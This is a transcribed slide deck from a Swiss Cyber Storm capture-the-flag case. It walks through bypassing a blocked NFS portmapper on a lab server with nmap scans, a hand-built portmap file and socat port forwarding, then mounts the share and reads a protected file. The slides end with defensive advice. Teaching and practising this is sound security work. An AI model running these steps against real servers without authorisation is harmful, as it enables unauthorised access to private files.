Swiss Cyber Storm II Case: NFS Hacking



Similar documents
Secure Network Filesystem (Secure NFS) By Travis Zigler

Chapter 11 Distributed File Systems. Distributed File Systems

Netfilter. GNU/Linux Kernel version 2.4+ Setting up firewall to allow NIS and NFS traffic. January 2008

We mean.network File System

What is included in the ATRC server support

1 Scope of Assessment

RPC and TI-RPC Test Suite Test Plan Document

SoftNAS Application Guide: In-Flight Encryption 12/7/2015 SOFTNAS LLC

Storage / SAN / NAS. Jarle Bjørgeengen University of Oslo / USIT. October 18, 2011

Allion Ingrasys Europe. NAStorage. Security policy under a UNIX/LINUX environment. Version 2.01

Migrating from NFSv3 to NFSv4. Migrating from NFSv3 to NFSv4. March of STORAGE NETWORKING INDUSTRY ASSOCIATION

Network File System (NFS) Pradipta De

NAStorage. Administrator Guide. Security Policy Of NAStorage Under UNIX/LINUX Environment

VMware vcenter Log Insight Security Guide

GL254 - RED HAT ENTERPRISE LINUX SYSTEMS ADMINISTRATION III

Insecure IP Storage Networks. Presenter: Himanshu Dwivedi Regional Technical Inc.

Testing New Applications In The DMZ Using VMware ESX. Ivan Dell Era Software Engineer IBM

Penetration Testing SIP Services

How to Backup XenServer VM with VirtualIQ

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

For more information or call

Immotec Systems, Inc. SQL Server 2005 Installation Document

USING COMMON LINUX COMMANDS TO TRACE THE ORIGINS OF POTENTIALLY ROGUE PROCESSES WITHIN A LINUX HOST (VIRTUAL MACHINE)

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu (Amd66) On Ubuntu 4.5 On A Windows Box

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

CONNECTING TO DEPARTMENT OF COMPUTER SCIENCE SERVERS BOTH FROM ON AND OFF CAMPUS USING TUNNELING, PuTTY, AND VNC Client Utilities

Worksheet 3: Distributed File Systems

Network Security: From Firewalls to Internet Critters Some Issues for Discussion

FILE ARCHIVING FROM NETAPP TO EMC DATA DOMAIN WITH EMC FILE MANAGEMENT APPLIANCE

A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006

Clustered Data ONTAP 8.2

Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003

Firewalls (IPTABLES)

Enabling Active Directory Authentication with ESX Server 1

Category: Standards Track August 1995

Review Quiz 1. What is the stateful firewall that is built into Mac OS X and Mac OS X Server?

Advanced Web Security, Lab

Network Security. Network Packet Analysis

FileBench's Multi-Client feature

Smart Card APDU Analysis

VMware vcenter Log Insight Security Guide

F-SECURE MESSAGING SECURITY GATEWAY

Red Hat System Administration 1(RH124) is Designed for IT Professionals who are new to Linux.

Configuring Windows Server Clusters

Homework 5b: Homework 5b: Samba

6WRUP:DWFK. Policies for Dedicated SQL Servers Group

NAS 224 Remote Access Manual Configuration

Fifty Critical Alerts for Monitoring Windows Servers Best practices

RemoteTM LAN Server User Guide

IBM. Vulnerability scanning and best practices

Avaya Operational Analyst 7.0 Security Guide COMPAS Issue 1.0 February 2005

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Five Steps to Improve Internal Network Security. Chattanooga ISSA

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

EXTRA. Vulnerability scanners are indispensable both VULNERABILITY SCANNER

Discovery Guide. Secret Server. Table of Contents

SWsoft, Inc. Plesk VPN. Administrator's Guide. Plesk 7.5 Reloaded

SMB a protocol example

TECHNICAL NOTE 01/02 PROTECTING YOUR COMPUTER NETWORK

Before deploying SiteAudit it is recommended to review the information below. This will ensure efficient installation and operation of SiteAudit.

finger, ftp, host, hostname, mesg, rcp, rlogin, rsh, scp, sftp, slogin, ssh, talk, telnet, users, w, walla, who, write,...

Scan Report Executive Summary. Part 2. Component Compliance Summary IP Address :

How To Manage File Access On Data Ontap On A Pc Or Mac Or Mac (For A Mac) On A Network (For Mac) With A Network Or Ipad (For An Ipad) On An Ipa (For Pc Or

Project Group High- performance Flexible File System

CSCI Firewalls and Packet Filtering

The Nexpose Expert System

Codes of Connection for Devices Connected to Newcastle University ICT Network

PRINT CONFIGURATION. 1. Printer Configuration

Penetration Testing with Kali Linux

Linux Security Ideas and Tips

SolarWinds Log & Event Manager

Managed VPSv3 Firewall Supplement

MilsVPN VPN Tunnel Port Translation. Table of Contents Introduction VPN Tunnel Settings...2

<Samba status report>

Cisco Secure PIX Firewall with Two Routers Configuration Example

GL550 - Enterprise Linux Security Administration

Lab 3: Recon and Firewalls

ENTERPRISE LINUX SECURITY ADMINISTRATION

TELE 301 Network Management. Lecture 17: File Transfer & Web Caching

13. Configuring FTP Services in Knoppix

Vulnerability Assessment and Penetration Testing

Last Class: Communication in Distributed Systems. Today: Remote Procedure Calls

Computer and Network Security Exercise no. 4

Intego Enterprise Software Deployment Guide

CA arcserve Unified Data Protection Agent for Linux

Requirements Collax Security Gateway Collax Business Server or Collax Platform Server including Collax SSL VPN module

Reverse Shells Enable Attackers To Operate From Your Network. Richard Hammer August 2006

NETWORK SECURITY WITH OPENSOURCE FIREWALL

Syncplicity On-Premise Storage Connector

GTA SSO Auth. Single Sign-On Service. Tel: Fax Web:

Introduction of Intrusion Detection Systems

60467 Project 1. Net Vulnerabilities scans and attacks. Chun Li

SCADA Security Example

File Transfer Examples. Running commands on other computers and transferring files between computers

VPNSCAN: Extending the Audit and Compliance Perimeter. Rob VandenBrink

Security of information systems secure file transfer

Linux NFS HOWTO. Tavis Barr. Nicolai Langfeldt. Seth Vidal. Tom McNeal. tavis dot barr at liu dot edu. janl at linpro dot no

Firewall Firewall August, 2003

Network Attached Storage. Jinfeng Yang Oct/19/2015

Transcription:

Swiss Cyber Storm II Case: NFS Hacking Axel Neumann <axel.neumann@csnc.ch> Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel +41 55-214 41 60 Fax +41 55-214 41 61 team@csnc.ch www.csnc.ch

What is NFS? Network File System (NFS) is a network file system protocol for UNIX developed by SUN Microsystems Access files over a network as if the network share were attached as a local hard disk NFS is making use of RPCs (Remote Procedure Calls) Accordant file system for Windows: SMB (aka. CIFS) Authentication for NFS g Client-Computer authenticates to NFSv3 (IP Address) g Since NFSv4 User-Authentication is possible (Kerberos) Slide 2

Typical NFSv3 Session (simplified) Slide 3

Typical NFSv3 Session (simplified) 1. Client connects to Portmapper (Port 111) and asks for Portnumber of the Mount Daemon (mountd) 2. Portmapper returns Portnumber of mountd 3. Client connects to mountd and asks for File-Handle for /knownshareddirectory 4. mountd returns File-Handle 0 5. Client connects to Portmapper and asks for NFS Portnumber (nfsd) 6. Portmapper returns Portnumber of nfsd Slide 4

Typical NFSv3 Session (simplified) 8. Client connects to nfsd and executes LOOKUP-routine, using File-Handle 0 and File-/Directory-Name 9. nfsd returns File-Handle 1 for specific File-/Directory-Name 10. Client executes READ-routine, using File-Handle 1 11. nfsd returns contents of specific File/Directory Portmapper is essential for NFSv3 Slide 5

Swiss Cyber Storm NFS Case What is the goal of the case? Get access to the file geheim-5022.txt which is stored on the NFS server What do we know? Server IP: 192.168.200.203 Exact name of share and file: home/geheim/geheim-5022.txt Dump of rcpinfo Slide 6

Swiss Cyber Storm NFS Solution Test the NFS server for exported shares bash # showmount e 192.168.200.203 mount clntudp_create: RCP: Port mapper failure RPC: Unable to receive showmount: The command showmount can be used to get information about the shared directories of the NFS server Slide 7

Scan the server (TCP) In the second step, we use NMAPs RPC grinder for detecting open RPC ports, RPC program and protocol version (TCP) bash # nmap sr p 1-65535 192.168.200.203 Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-04 09:33 UTC Interesting ports on ubuntu-vm (192.168.200.203): Not shown: 65530 closed ports PORT STATE SERVICE VERSION 111/tcp filtered rpcbind 2049/tcp open nfs 2-4 (rpc #100003) 51979/tcp open nlockmgr 1-4 (rpc #100021) 57543/tcp open mountd 1-3 (rpc #100005) 60644/tcp open status 1 (rpc #100024) MAC Address: 00:0C:29:1D:50:0C (VMware) Nmap done: 1 IP address (1 host up) scanned in 12.898 seconds Slide 8

Scan the server (UDP) Again, we use NMAPs RPC grinder for detecting open RPC ports, RPC program and protocol version (UDP) bash # nmap sur p 1-65535 192.168.200.203 Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-04 09:39 UTC Interesting ports on ubuntu-vm (192.168.200.203): PORT STATE SERVICE VERSION 68/udp open filtered dhcpc 111/udp closed rpcbind 806/udp open filtered unknown 2049/udp open nfs 2-4 (rpc #100003) 5353/udp open filtered zeroconf 44139/udp open status 1 (rpc #100024) 49456/udp open filtered unknown 52663/udp open nlockmgr 1-4 (rpc #100021) 55545/udp open mountd 1-3 (rpc #100005) MAC Address: 00:0C:29:1D:50:0C (Vmware) Slide 9

The Shortcut As you could drink dozens of coffees until the scan would be finished, we take the shortcut http://192.168.200.203/nfs/rpcinfo.out program vers proto port 100000 2 tcp 111 portmapper 100024 1 udp 44139 status 100024 1 tcp 60644 status 100021 2 tcp 51979 nlockmgr 100021 2 udp 52663 nlockmgr 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs... output shortened Slide 10

Portstatus and description rpcbind nlockmgr mountd nfsd status Provides a mapping from a service name to the portnumber it's running on Forwards local file locking requests to the lock manager on the server system The rpc.mountd server provides an ancillary service needed to satisfy mount requests by NFS clients The rpc.nfsd program implements the user level part of the NFS service If an NFS server crashes and comes back alive, rpc.statd can notify clients about that event. As this is only an informational service, it can be neglected for attacking NFS Slide 11

Scanning results The scanning revealed the ports that are used by the NFS server Port 111 (portmapper) is closed All other ports used for NFS remain open Assumption: The Administrator just blocked the portmapper s port to deny NFS usage Slide 12

NFS without portmapper NFSv3 needs the portmapper to work properly! Does the portmapper have to be on the NFS server itself? Let s try to build our own portmapper service! Slide 13

Create your own portmap file Read out Service, Port number, RPC number and Version of the available NFS services PORT STATE SERVICE VERSION 2049/udp open nfs 2-4 (rpc #100003) 52663/udp open nlockmgr 1-4 (rpc #100021) 55545/udp open mountd 1-3 (rpc #100005) 2049/tcp open nfs 2-4 (rpc #100003) 51979/tcp open nlockmgr 1-4 (rpc #100021) 57543/tcp open mountd 1-3 (rpc #100005) Create portfile (portmap.txt) using the information above (Example for Service: nfs) # RPC-NUMBER NFS-VERSION PROTOCOL PORT SERVICE 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs Slide 14

Complete portmap file (portmap.txt) # RPC-NUMBER NFS-VERSION PROTOCOL PORT SERVICE 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100005 1 tcp 57543 mountd 100005 2 tcp 57543 mountd 100005 3 tcp 57543 mountd 100005 1 udp 55545 mountd 100005 2 udp 55545 mountd 100005 3 udp 55545 mountd 100021 1 tcp 51979 nlockmgr 100021 2 tcp 51979 nlockmgr 100021 3 tcp 51979 nlockmgr 100021 4 tcp 51979 nlockmgr 100021 1 udp 52663 nlockmgr 100021 2 udp 52663 nlockmgr 100021 3 udp 52663 nlockmgr 100021 4 udp 52663 nlockmgr Slide 15

Using the portmap file Now, start your own local instance of the portmapper using the newly created self-defined portmap file (portmap.txt) bash # portmap bash # pmap_set < portmap.txt Check the local portmapper. When working correctly, it returns the mapping that is defined in the file bash # rpcinfo p 127.0.0.1 program vers proto port 100000 2 tcp 111 portmapper 100024 1 udp 44139 status 100024 1 tcp 60644 status 100021 2 tcp 51979 nlockmgr 100021 2 udp 52663 nlockmgr 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs... output shortened Slide 16

Tricking the NFS server We now have an own portmapper service. It is only running locally and does not know anything of remote NFS services Our local portmapper has the same configuration as the one that is running on the NFS server To connect, we simply have to configure local port forwarding of the accordant NFS ports using socat, inetd, ssh,... Slide 17

Local portmapper Remote NFS Again, look at the scanning results for all detected NFS ports PORT STATE SERVICE VERSION 2049/udp open nfs 2-4 (rpc #100003) 52663/udp open nlockmgr 1-4 (rpc #100021) 55545/udp open mountd 1-3 (rpc #100005) 2049/tcp open nfs 2-4 (rpc #100003) 51979/tcp open nlockmgr 1-4 (rpc #100021) 57543/tcp open mountd 1-3 (rpc #100005) Create local port forwarding to the original NFS server for all ports (In this example, we are using the tool: socat) # nfs service TCP,UDP socat tcp4-listen:2049,fork tcp4-connect:192.168.200.203:2049 & socat udp4-listen:2049,fork udp4-connect:192.168.200.203:2049 & # mountd service TCP,UDP socat tcp4-listen:57543,fork tcp4-connect:192.168.200.203:57543 & socat udp4-listen:55545,fork udp4-connect:192.168.200.203:55545 & # nlockmgr TCP,UDP socat tcp4-listen:51979,fork tcp4-connect:192.168.200.203:51979 & socat udp4-listen:52663,fork udp4-connect:192.168.200.203:52663 & Slide 18

Mount remote NFS share Query for the shares of the remote NFS server by using localhost as NFS server bash # showmount e 127.0.0.1 Export list for 127.0.0.1: /home/geheim * Mount the remote NFS share locally bash # mount t nfs 127.0.0.1:/home/geheim /mnt Read file bash # cat /mnt/geheim-5022.txt Gratuliere, du hast den NFS Case gelöst! Slide 19

Recommendations If you use firewalls, always prefer whitelisting to give access to different services Prefer usage of NFSv4 (Many security enhancements) Slide 20

Used software Nmap (http://nmap.org) socat (http://www.dest-unreach.org/socat/) NFS-Tools (http://www.linux-nfs.org/) Portmap (http://neil.brown.name/portmap/) Slide 21

Questions Slide 22

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information